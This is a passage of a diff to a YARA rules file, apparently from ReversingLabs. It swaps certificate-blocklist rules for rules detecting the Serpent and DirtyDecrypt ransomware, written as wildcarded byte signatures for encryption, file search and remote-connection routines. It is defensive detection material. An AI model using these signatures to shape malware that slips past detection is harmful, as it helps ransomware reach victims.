+            24 ?? ?? 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            FF D3 85 C0 75 ?? 8B 45 ?? 56 48 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8D
+            44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 31 83 C1 ?? 66 85 F6 75 ??
+            2B CA D1 F9 8D 4C 4C ?? 3B C1 74 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 74 ?? FF 75
+            ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 5B 8B E5 5D C2
+        }
+		$shutdown = {
+            68 ?? ?? ?? ?? 8B CA 8B D0 0F B7 45 ?? 03 C2 33 D2 F7 F6 0F B7 75 ?? 8D 85 ?? ?? ??
+            ?? 50 03 F1 8B FA FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? F6 05 ?? ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 56 57 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 56 57
+            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 5F 5E 8B C3 5B C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAITLAND TRIFECTA, INC." and pe.signatures [ i ] . serial == "64:cd:30:3f:a2:89:79:0a:fa:03:c4:03:e9:24:00:02" and 1602723600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_file and $main and $encryption_loop and $shutdown
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07Cef66A71C35Bc3Aed6D100C6493863 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Serpent : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Serpent ransomware."
 		author = "ReversingLabs"
-		id = "9c16c370-a382-54f7-ba2e-3b738740966f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "0757ad7c-b2b1-5323-960a-55ffe3eaed12"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6122-L6138"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e741fc13fe4d03b145ed1d86e738b415a7260eae5b0908c6991c9ea9896f14cf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Serpent.yara#L1-L122"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5e1917e8d23a5edc65ac423f3d18cc78c3848bd6c1ccc67d052eb37172857081"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Serpent"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$do_dll_stuff_and_create_thread = {
+            68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 89 D2 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 89 FF 90 90 6A ?? 53 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BA
+            ?? ?? ?? ?? 66 0F 6E D2 89 FF 89 C9 31 D2 66 0F 7E D2 89 15 ?? ?? ?? ?? 81 3D ?? ??
+            ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 89 C9 4B
+            75 ?? 89 C9 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 4B
+            75 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 4B
+            75 ?? 89 FF 90 BB ?? ?? ?? ?? 89 C9 4B 75 ?? 90 90 BB ?? ?? ?? ?? 4B 75 ?? BB ?? ??
+            ?? ?? 4B 75 ?? BB ?? ?? ?? ?? 4B 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 90 BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 90 89 C9 BB ?? ?? ?? ?? 89 FF 4B 75 ?? 68 ?? ?? ?? ??
+            6A ?? 56 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 D2 4B 75 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33
+            C0 A3 ?? ?? ?? ?? 64 8B 35 ?? ?? ?? ?? 89 35 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ??
+            90 89 F6 90 BB ?? ?? ?? ?? 89 DB 4B 75 ?? 89 D2 89 C0 BB ?? ?? ?? ?? 89 D2 4B 75 ??
+            C7 05 ?? ?? ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 89 FF 4B 75 ?? 89 C0 0F 31 90 89 C7 0F
+            31 90 89 C0 29 F8 89 D2 89 DB 77 ?? 90 90 89 C9 89 F6 8B 3D ?? ?? ?? ?? 90 90 89 C9
+            89 F6 90 03 3D ?? ?? ?? ?? 90 90 89 C9 89 F6 FF D7 89 F6 90 90 BB ?? ?? ?? ?? 4B 75
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? C3
+        }
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45
+            ?? 8B 58 ?? 83 7B ?? ?? 75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 55 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 73 ?? 6A ?? 8D 45 ?? 50 8B 43 ?? 50 E8 ?? ?? ?? ??
+            81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ??
+            50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 43 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? C6 85
+            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 EB ?? 8B 43 ?? 89
+            85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ??
+            89 B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 95 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B D8 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 FF 05 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 8B 83
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 68 ?? ?? ?? ?? 66 8B 83
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? 8D 55 ?? 33 C0 8A 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 45 ?? 8D 93 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ??
+            ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 8D 55 ?? 0F B7
+            83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55
+            ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 51 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ??
+            6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 76 ?? E8 ?? ?? ?? ?? 66 89 B3 ??
+            ?? ?? ?? 66 C7 45 ?? ?? ?? 66 C7 45 ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 0F B7 C6 50 E8 ?? ?? ?? ?? 66 81 BB ?? ?? ?? ?? ?? ?? 75 ?? 8D 4D ?? 66 BA
+            ?? ?? 8B C3 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 0F B7 83 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? FF 0D ?? ?? ??
+            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
+        }
+		$remote_ftp_connection = {
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66
+            8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ??
+            ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ?? ?? 75 ?? B9
+            ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66 8B 80
+            ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74
+            ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 83 B8
+            ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ?? 8D 55 ?? 8B 5D ?? 8B 83
+            ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45
+            ?? 8A 80 ?? ?? ?? ?? 2C ?? 72 ?? 74 ?? FE C8 74 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
+            45 ?? FF B0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8B 45 ?? 8B 88
+            ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18
+            FF 53 ?? EB ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ??
+            80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ??
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ??
+            8B 45 ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8
+            ?? ?? ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ??
+            B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ??
+            ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D
+            45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45
+            ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ??
+            ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ??
+            8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fubon Technologies Ltd" and pe.signatures [ i ] . serial == "07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" and 1602740890 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $do_dll_stuff_and_create_thread and $find_files and $remote_connection and $remote_ftp_connection
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Be77Fe5C58B7A360Add6A3Fced4E8334 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dirtydecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DirtyDecrypt ransomware."
 		author = "ReversingLabs"
-		id = "1bbaebe9-b3ca-5ee2-91ac-b2343ca8bb86"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "f4d69c3e-a082-5bc9-bf72-4cc330d3de74"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6140-L6158"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cea0d217206562c0045843405802d3b2fad01bdb2a4cfb52057625b43f5f8eee"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.DirtyDecrypt.yara#L3-L112"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "eb6a1c376b0739848b523e741d0d1ebdbc87056d51931fb94c744aa094d6479f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DirtyDecrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$dd_ep = {
+            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 BF 00 00 00 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74
+            1F 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB
+            09 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D ?? ?? 73 15 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 44 95 ?? EB DC 6A ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A
+            ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2 ?? ??
+        }
+		$dd_hash = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 D5 00 00 00 83 7D ?? ?? 0F 84 CB 00 00 00 83 7D ?? ?? 0F 84 C1
+            00 00 00 83 7D ?? ?? 0F 84 B7 00 00 00 83 7D ?? ?? 0F 84 AD 00 00 00 83 7D ?? ?? 0F 84 A3 00 00 00 C7 45 ?? ?? ?? ?? ??
+            8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 6F 83 7D ?? ?? 76 2A 6A ?? 6A ?? 8B
+            55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 51 8B 4D ?? 83 E9 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 6A ?? 8B
+            45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 25 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B
+            45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 33 C9 0F 85 74 FF FF FF 83 7D ?? ?? 74 0A 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B
+            E5 5D C2 ?? ??
+        }
+		$dd_getkey = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 31 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 8B 55
+            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 89 45 ?? 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_destroykey = {
+            55 8B EC 83 7D ?? ?? 74 0A 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5D C2
+        }
+		$dd_importkey = {
+            55 8B EC 51 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 8B 08 51 8B 55 ?? 52 FF 15 ?? ??
+            ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_decrypt = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 22 01 00 00 83 7D ?? ?? 0F 84 18 01 00 00 83 7D ?? ?? 0F 84 0E
+            01 00 00 83 7D ?? ?? 0F 84 04 01 00 00 83 7D ?? ?? 0F 84 FA 00 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 33 D2
+            F7 75 ?? 0F AF 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 02 03 45 ?? 89 45 ?? 8B 4D ?? 8B 11 03 55 ?? 52 8B 45 ?? 8B
+            08 51 6A ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 02 8B 45 ?? 83 38 ?? 0F 84 A7 00 00 00 8B 4D ?? 8B 11 8B 45 ?? 03 10 89 55 ?? 83
+            7D ?? ?? 74 61 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ??
+            89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 1D 8B 4D ?? 03 4D ?? 89
+            4D ?? 8B 55 ?? 2B 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89 45 ?? EB 99 83 7D ?? ?? 75 15 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 45 ??
+            2B 02 8B 4D ?? 89 01 EB 18 8B 55 ?? 8B 02 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2
+            ?? ??
+        }
+		$dd_encrypt = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 89 01 00 00 83 7D ?? ?? 0F 84 7F 01 00 00 83 7D ?? ?? 0F 84 75
+            01 00 00 83 7D ?? ?? 0F 84 6B 01 00 00 83 7D ?? ?? 0F 84 61 01 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 83 E9
+            ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 26 01
+            00 00 8B 55 ?? 3B 55 ?? 76 08 8B 45 ?? 89 45 ?? EB 06 8B 4D ?? 89 4D ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 33 D2 F7 75 ?? 0F AF
+            45 ?? 8B 4D ?? 8B 11 03 D0 03 55 ?? 89 55 ?? 8B 45 ?? 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ??
+            83 3A ?? 0F 84 CF 00 00 00 8B 45 ?? 8B 08 8B 55 ?? 03 0A 89 4D ?? 83 7D ?? ?? 0F 84 84 00 00 00 8B 45 ?? 3B 45 ?? 73 08
+            8B 4D ?? 89 4D ?? EB 06 8B 55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
+            4D ?? 89 4D ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 2D 8B
+            45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D ?? 03 4D ?? 89 4D ?? E9
+            72 FF FF FF 83 7D ?? ?? 75 16 8B 55 ?? 8B 45 ?? 2B 02 8B 4D ?? 89 01 C7 45 ?? ?? ?? ?? ?? EB 18 8B 55 ?? 8B 02 50 8B 4D
+            ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_provparam = {
+            55 8B EC 83 EC ?? 83 7D ?? ?? 0F 84 94 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ??
+            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 74 3F 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 2A 6A ?? 8D 45 ??
